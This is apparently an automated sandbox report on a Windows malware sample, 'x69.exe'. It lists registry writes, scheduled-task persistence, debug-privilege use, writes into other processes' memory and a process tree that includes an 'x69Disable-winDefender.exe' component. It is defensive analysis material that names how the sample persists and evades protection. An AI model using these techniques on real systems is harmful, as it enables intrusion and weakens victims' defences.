c30e0d56880d62d3b6d27f01188efda1c34833c0084ea00e572e50042b4785bbc30e0d56880d62d3b6d27f01188efda1c34833c00ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600320033003600310037003700350034002d0034003000340033003700300031003600310031002d003700370035003500360034003500390039002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002fa3b82a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = 9fdb082203c9db01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009dd8732103c9db010d58ec2103c9db010d58ec2103c9db01768d05000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35aeba92000643236643762343436643066353234393434393731643363306438616639303937326366626638303561353938336665303564633736383762656431393763630000b20009000400efbeb35aeba9b35aeba92e000000000000000000000000000000000000000000000000009d385400640032003600640037006200340034003600640030006600350032003400390034003400390037003100640033006300300064003800610066003900300039003700320063006600620066003800300035006100350039003800330066006500300035006400630037003600380037006200650064003100390037006300630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000029696f831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64323664376234343664306635323439343439373164336330643861663930393732636662663830356135393833666530356463373638376265643139376363000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000716a65746f707675000000000000000084ea00e572e50042b4785bbc30e0d5687cd62d3b6d27f01188efda1c34833c0084ea00e572e50042b4785bbc30e0d5687cd62d3b6d27f01188efda1c34833c00ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600320033003600310037003700350034002d0034003000340033003700300031003600310031002d003700370035003500360034003500390039002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002fa3b82a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b017c94e-35f3-4c1e- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b017c94e-35f3-4c1e- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = 11730a2103c9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- = 4503122103c9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d26d7b446d0f524944971d3c0d8af90972cfbf805a5983fe05dc7687bed197cc" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108f40b4-2f7a-4e2d- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fca21b2103c9db01fca21b2103c9db01fca21b2103c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35aeba92000373439386561326435643663333538613232333166313937643739336233326534363066636233353038313664646635353636623632343137663064316334350000b20009000400efbeb35aeba9b35aeba92e0000000000000000000000000000000000000000000000000004ae4a00370034003900380065006100320064003500640036006300330035003800610032003200330031006600310039003700640037003900330062003300320065003400360030006600630062003300350030003800310036006400640066003500350036003600620036003200340031003700660030006400310063003400350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000029696f831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37343938656132643564366333353861323233316631393764373933623332653436306663623335303831366464663535363662363234313766306431633435000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000716a65746f707675000000000000000084ea00e572e50042b4785bbc30e0d56877d62d3b6d27f01188efda1c34833c0084ea00e572e50042b4785bbc30e0d56877d62d3b6d27f01188efda1c34833c00ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600320033003600310037003700350034002d0034003000340033003700300031003600310031002d003700370035003500360034003500390039002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002fa3b82a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = 3ee82b2103c9db01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c204875d-0f97-4961- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a1ca032103c9db01a1ca032103c9db01a1ca032103c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35aeba92000646564363062366538616135623137396539333132636361613739326635623663313863353239626462353532336233373665393934346437363863383437350000b20009000400efbeb35aeba9b35aeba92e000000000000000000000000000000000000000000000000005f866200640065006400360030006200360065003800610061003500620031003700390065003900330031003200630063006100610037003900320066003500620036006300310038006300350032003900620064006200350035003200330062003300370036006500390039003400340064003700360038006300380034003700350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000029696f831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64656436306236653861613562313739653933313263636161373932663562366331386335323962646235353233623337366539393434643736386338343735000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000716a65746f707675000000000000000084ea00e572e50042b4785bbc30e0d56874d62d3b6d27f01188efda1c34833c0084ea00e572e50042b4785bbc30e0d56874d62d3b6d27f01188efda1c34833c00ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600320033003600310037003700350034002d0034003000340033003700300031003600310031002d003700370035003500360034003500390039002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002fa3b82a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\b1f7ea5645e0dd8d96ad14dd6b470e9f01729817c174c333915df368649e3f60" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e196ff71-cda8-4265- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d89c48b-6c1e-428f- = 62cd272103c9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e80abc91-9511-4cbf- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d26d7b446d0f524944971d3c0d8af90972cfbf805a5983fe05dc7687bed197cc" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca181a0a-17d4-4b39- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a904331b-3d67-48ab- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c738c0f0-335a-47aa- = "\\\\?\\Volume{2AB8A32F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4c367a787e45e8c0925f73cea7c418e5e8dafb2501d5efda2f09a9254577958c" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6a93f9f2-8ce6-4d28- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3708 schtasks.exe 2412 schtasks.exe 4840 schtasks.exe 1888 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 980 x69.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3956 powershell.exe 3956 powershell.exe 2580 powershell.exe 2580 powershell.exe 2580 powershell.exe 4172 powershell.exe 4172 powershell.exe 4172 powershell.exe 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 2580 powershell.exe 2580 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 2580 powershell.exe 4824 powershell.exe 4824 powershell.exe 4824 powershell.exe 4692 powershell.exe 4692 powershell.exe 4692 powershell.exe 4092 powershell.EXE 4092 powershell.EXE 4092 powershell.EXE 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3176 powershell.exe 3176 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 3176 powershell.exe 2840 powershell.exe 2840 powershell.exe 3400 powershell.exe 3400 powershell.exe 3400 powershell.exe 2840 powershell.exe 3192 powershell.exe 3192 powershell.exe 3192 powershell.exe 2580 powershell.exe 2580 powershell.exe 2580 powershell.exe 1432 powershell.exe 1432 powershell.exe 1432 powershell.exe 3572 powershell.exe 3572 powershell.exe 3572 powershell.exe 2424 powershell.exe 2424 powershell.exe 2424 powershell.exe 4148 powershell.exe 4148 powershell.exe 3596 powershell.exe 3596 powershell.exe 3596 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3412 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4904 x69.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 980 x69.exe Token: SeDebugPrivilege 4556 x69.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 4824 powershell.exe Token: SeDebugPrivilege 4692 powershell.exe Token: SeDebugPrivilege 4092 powershell.EXE Token: SeDebugPrivilege 3908 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 3176 powershell.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 3192 powershell.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 980 x69.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeDebugPrivilege 3972 powershell.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeDebugPrivilege 4056 powershell.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 4088 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 4828 powershell.exe Token: SeDebugPrivilege 4436 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeDebugPrivilege 3984 powershell.exe Token: SeDebugPrivilege 4308 powershell.exe Token: SeDebugPrivilege 3756 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 4092 powershell.EXE Token: SeDebugPrivilege 3508 dllhost.exe Token: SeDebugPrivilege 4600 x69.exe Token: SeAuditPrivilege 2716 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1912 svchost.exe Token: SeIncreaseQuotaPrivilege 1912 svchost.exe Token: SeSecurityPrivilege 1912 svchost.exe Token: SeTakeOwnershipPrivilege 1912 svchost.exe Token: SeLoadDriverPrivilege 1912 svchost.exe Token: SeSystemtimePrivilege 1912 svchost.exe Token: SeBackupPrivilege 1912 svchost.exe Token: SeRestorePrivilege 1912 svchost.exe Token: SeShutdownPrivilege 1912 svchost.exe Token: SeSystemEnvironmentPrivilege 1912 svchost.exe Token: SeUndockPrivilege 1912 svchost.exe Token: SeManageVolumePrivilege 1912 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1912 svchost.exe -
Suspicious use of FindShellTrayWindow 15 IoCs
pid Process 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 3412 Explorer.EXE 3412 Explorer.EXE -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe 2764 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4904 wrote to memory of 3956 4904 x69.exe 93 PID 4904 wrote to memory of 3956 4904 x69.exe 93 PID 4904 wrote to memory of 3708 4904 x69.exe 121 PID 4904 wrote to memory of 3708 4904 x69.exe 121 PID 2976 wrote to memory of 980 2976 cmd.exe 101 PID 2976 wrote to memory of 980 2976 cmd.exe 101 PID 4904 wrote to memory of 4556 4904 x69.exe 102 PID 4904 wrote to memory of 4556 4904 x69.exe 102 PID 4904 wrote to memory of 2580 4904 x69.exe 123 PID 4904 wrote to memory of 2580 4904 x69.exe 123 PID 4904 wrote to memory of 2412 4904 x69.exe 106 PID 4904 wrote to memory of 2412 4904 x69.exe 106 PID 4904 wrote to memory of 2612 4904 x69.exe 110 PID 4904 wrote to memory of 2612 4904 x69.exe 110 PID 4904 wrote to memory of 2612 4904 x69.exe 110 PID 4904 wrote to memory of 4172 4904 x69.exe 111 PID 4904 wrote to memory of 4172 4904 x69.exe 111 PID 1520 wrote to memory of 3432 1520 cmd.exe 113 PID 1520 wrote to memory of 3432 1520 cmd.exe 113 PID 1520 wrote to memory of 3432 1520 cmd.exe 113 PID 2612 wrote to memory of 4120 2612 x69Disable-winDefender.exe 114 PID 2612 wrote to memory of 4120 2612 x69Disable-winDefender.exe 114 PID 2612 wrote to memory of 4120 2612 x69Disable-winDefender.exe 114 PID 3432 wrote to memory of 2456 3432 x69Disable-winDefender.exe 115 PID 3432 wrote to memory of 2456 3432 x69Disable-winDefender.exe 115 PID 3432 wrote to memory of 2456 3432 x69Disable-winDefender.exe 115 PID 3432 wrote to memory of 3408 3432 x69Disable-winDefender.exe 116 PID 3432 wrote to memory of 3408 3432 x69Disable-winDefender.exe 116 PID 2612 wrote to memory of 1156 2612 x69Disable-winDefender.exe 118 PID 2612 wrote to memory of 1156 2612 x69Disable-winDefender.exe 118 PID 3408 wrote to memory of 3708 3408 cmd.exe 121 PID 3408 wrote to memory of 3708 3408 cmd.exe 121 PID 1156 wrote to memory of 3264 1156 cmd.exe 122 PID 1156 wrote to memory of 3264 1156 cmd.exe 122 PID 3408 wrote to memory of 2580 3408 cmd.exe 148 PID 3408 wrote to memory of 2580 3408 cmd.exe 148 PID 4904 wrote to memory of 4840 4904 x69.exe 124 PID 4904 wrote to memory of 4840 4904 x69.exe 124 PID 1156 wrote to memory of 4148 1156 cmd.exe 165 PID 1156 wrote to memory of 4148 1156 cmd.exe 165 PID 4904 wrote to memory of 1864 4904 x69.exe 128 PID 4904 wrote to memory of 1864 4904 x69.exe 128 PID 4904 wrote to memory of 1864 4904 x69.exe 128 PID 1864 wrote to memory of 2864 1864 x69install.exe 130 PID 1864 wrote to memory of 2864 1864 x69install.exe 130 PID 1864 wrote to memory of 2864 1864 x69install.exe 130 PID 4016 wrote to memory of 3136 4016 cmd.exe 132 PID 4016 wrote to memory of 3136 4016 cmd.exe 132 PID 4016 wrote to memory of 3136 4016 cmd.exe 132 PID 1156 wrote to memory of 4824 1156 cmd.exe 135 PID 1156 wrote to memory of 4824 1156 cmd.exe 135 PID 3408 wrote to memory of 4692 3408 cmd.exe 227 PID 3408 wrote to memory of 4692 3408 cmd.exe 227 PID 1156 wrote to memory of 3908 1156 cmd.exe 221 PID 1156 wrote to memory of 3908 1156 cmd.exe 221 PID 980 wrote to memory of 3176 980 x69.exe 139 PID 980 wrote to memory of 3176 980 x69.exe 139 PID 3408 wrote to memory of 1444 3408 cmd.exe 168 PID 3408 wrote to memory of 1444 3408 cmd.exe 168 PID 980 wrote to memory of 2840 980 x69.exe 142 PID 980 wrote to memory of 2840 980 x69.exe 142 PID 1156 wrote to memory of 3400 1156 cmd.exe 228 PID 1156 wrote to memory of 3400 1156 cmd.exe 228 PID 3408 wrote to memory of 3192 3408 cmd.exe 145 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
